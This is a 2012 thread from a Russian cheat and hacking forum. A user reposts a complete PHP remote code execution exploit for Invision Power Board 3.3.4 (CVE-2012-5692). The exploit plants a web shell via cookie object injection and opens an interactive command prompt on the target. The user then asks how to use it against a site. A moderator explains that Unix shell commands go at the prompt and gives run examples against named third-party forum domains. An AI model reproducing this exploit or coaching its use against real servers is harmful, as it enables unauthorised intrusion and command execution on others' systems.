Логотип игрового форума RF-Cheats.ru    
Новости онлайн игр Обход античитов Чёрный рынок Реклама и привилегии Разработка читов Арбитраж

Регистрация Бан-лист Сообщество ПОПУЛЯРНОЕ
Вернуться   RF-Cheats.ru - форум читеров и ботоводов > > >

Взлом сайтов (XSS, SQL Injection, etc)

: Взлом сайтов, WEB-движков, форумом, CMS и так далее
Читы и обход фроста для RF Online без хайдаБоты и читы для Perfect World бесплатно без хайдаМоды и читы для World of Tanks (WoT) бесплатно без хайдаМоды и читы для Armored Warfare бесплатно без хайдаБоты и читы для DOTA 2 бесплатно без хайдаБоты и читы для Black Desert Online бесплатно без хайдаЧиты на ArcheAge бесплатно без хайдаЧиты для Warface бесплатно без хайдаВзлом ВКонтакте и ОдноклассниковСписок разделов со всеми играмиЧиты для онлайн игр






Ответ
 
Опции темы
Старый 22.11.2012, 15:15   #1
kingkiller
Продвинутый читер
Аватар для kingkiller
OFFLINE
Регистрация: 04.09.2010
Возраст: 31
Сообщений: 322
Благодарностей:
109 всего
Мнения: + 923
Репутация: 328

IP Board 3.3.4 дырь


PHP код:
<?php
 
/*
    ----------------------------------------------------------------
    Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
    ----------------------------------------------------------------
     
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s***91;at***93;gmail***91;dot***93;com
    software link.......: http://www.invisionpower.com/
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
     
    ***91;-***93; Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
     
    4015.        static public function get($name)
    4016.        {
    4017.            // Check internal data first
    4018.            if ( isset( self::$_cookiesSet***91; $name ***93; ) )
    4019.            {
    4020.                return self::$_cookiesSet***91; $name ***93;;
    4021.            }
    4022.            else if ( isset( $_COOKIE***91;ipsRegistry::$settings***91;'cookie_id'***93;.$name***93; ) )
    4023.            {
    4024.                $_value = $_COOKIE***91; ipsRegistry::$settings***91;'cookie_id'***93;.$name ***93;;
    4025.   
    4026.                if ( substr( $_value, 0, 2 ) == 'a:' )
    4027.                {
    4028.                    return unserialize( stripslashes( urldecode( $_value ) ) );
    4029.                }
     
    The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
    sanitization. The only one check is done at line 4026,  where is controlled that the serialized string starts
    with 'a:',  but this is not  sufficient to prevent a  "PHP Object Injection"  because an attacker may send  a
    serialized string which represents an array of objects.  This can be  exploited to execute arbitrary PHP code
    via the  "__destruct()" method of the  "dbMain" class,  which calls the "writeDebugLog" method to write debug
    info into a file.  PHP code may  be injected  only through the  $_SERVER***91;'QUERY_STRING'***93;  variable,  for this
    reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
 
    ***91;-***93; Disclosure timeline:
     
    ***91;21/10/2012***93; - Vulnerability discovered
    ***91;23/10/2012***93; - Vendor notified
    ***91;25/10/2012***93; - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
    ***91;25/10/2012***93; - CVE number requested
    ***91;29/10/2012***93; - Assigned CVE-2012-5692
    ***91;31/10/2012***93; - Public disclosure
 
*/
 
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout'5);
 
function 
http_send($host$packet)
{
    if (!(
$sock fsockopen($host80))) die("\n***91;-***93; No response from {$host}:80\n");
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}
 
print 
"\n+---------------------------------------------------------------------+";
print 
"\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print 
"\n+---------------------------------------------------------------------+\n";
 
if (
$argc 3)
{
    print 
"\nUsage......: php $argv***91;0***93; <host> <path>\n";
    print 
"\nExample....: php $argv***91;0***93; localhost /";
    print 
"\nExample....: php $argv***91;0***93; localhost /ipb/\n";
    die();
}
 
list(
$host$path) = array($argv***91;1***93;, $argv***91;2***93;);
 
$packet  "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
     
$_prefix preg_match('/Cookie: (.+)session/'http_send($host$packet), $m) ?  $m***91;1***93; : '';
 
class 
db_driver_mysql
{
    public 
$obj = array('use_debug_log' => 1'debug_log' => 'cache/sh.php');
}
 
$payload urlencode(serialize(array(new db_driver_mysql)));
$phpcode '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER***91;HTTP_CMD***93;));die;?>';
 
$packet  "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
 
http_send($host$packet);
 
$packet  "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
 
if (
preg_match('/<\?error/'http_send($host$packet))) die("\n***91;-***93; short_open_tag disabled!\n");
 
while(
1)
{
    print 
"\nipb-shell# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
$response http_send($hostsprintf($packetbase64_encode($cmd)));
    
preg_match('/___(.*)/s'$response$m) ? print $m***91;1***93; : die("\n***91;-***93; Exploit failed!\n");
}
запускаю через цмд, вид принимает:
c:/*****/php.exe c:/****/q.php site.ru site.ru/forum/
дальше мне выдаёт ipb-shell# *и сюда текст*
я не могу понять,что писать после ipb-shell#,может кто объяснить?
 
Ответить с цитированием


Старый 22.11.2012, 15:21   #2
котопес
Супер-модератор
Аватар для котопес
OFFLINE
Регистрация: 22.12.2008
Возраст: 48
Сообщений: 1,100
Благодарностей:
2,845 всего
Мнения: + 6410
Репутация: 9104

писать шелл команды юникса :) если не закрыта дырка или не отключено passthru то тебе выведется результат.
например
echo "ololo"

запускать:
php ipb334.php forum.rf-pvp.ru /
или
php ipb334.php site.ru /forum/

Последний раз редактировалось котопес; 22.11.2012 в 15:31.

BigData DBA/DataInfraOps
 
Ответить с цитированием
Сказали спасибо:
kingkiller (22.11.2012)
Старый 22.11.2012, 15:23   #3
kingkiller
Продвинутый читер
Аватар для kingkiller
OFFLINE
Регистрация: 04.09.2010
Возраст: 31
Сообщений: 322
Благодарностей:
109 всего
Мнения: + 923
Репутация: 328

а вообще правильный вид принимает? ну всмысле как я написал,или по другому нужно?

Добавлено через 19 минут
так,а если passthru выключен,то выдаст ошибку?

Последний раз редактировалось kingkiller; 22.11.2012 в 15:42. Причина: Добавлено сообщение
 
Ответить с цитированием
Старый 22.11.2012, 15:53   #4
котопес
Супер-модератор
Аватар для котопес
OFFLINE
Регистрация: 22.12.2008
Возраст: 48
Сообщений: 1,100
Благодарностей:
2,845 всего
Мнения: + 6410
Репутация: 9104

Цитата:
Сообщение от kingkiller Посмотреть сообщение
так,а если passthru выключен,то выдаст ошибку?
выдаст как и при закрытой дырке: Exploit failed

BigData DBA/DataInfraOps
 
Ответить с цитированием
Ответ



Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Add2 Board 4 Korpi9 Общение читеров 0 06.10.2012 01:54
IP Board 3.2.1 BlackApple Архив 4 27.04.2012 15:58
Вопрос по IP.Board 3 Электрод Взлом и программирование 2 01.03.2012 19:11
Вопрос по IP.Board 3 Электрод Просьбы 0 01.03.2012 11:00

Мир танков | Проект "Армата" | ArcheAge | Black Desert | РФ Онлайн | Айон | Майнкрафт | Браузерные игры
Элдер скролс | Р2 Онлайн | Реквием Онлайн | ПУБГ | Роял Квест | ГТА Санадреас | Контра | Дота 2
Мир кораблей | Лост Арк | Arma2 DayZ mod | The War Z | Карос: Начало | Tera Online
Читы для всех Онлайн-игр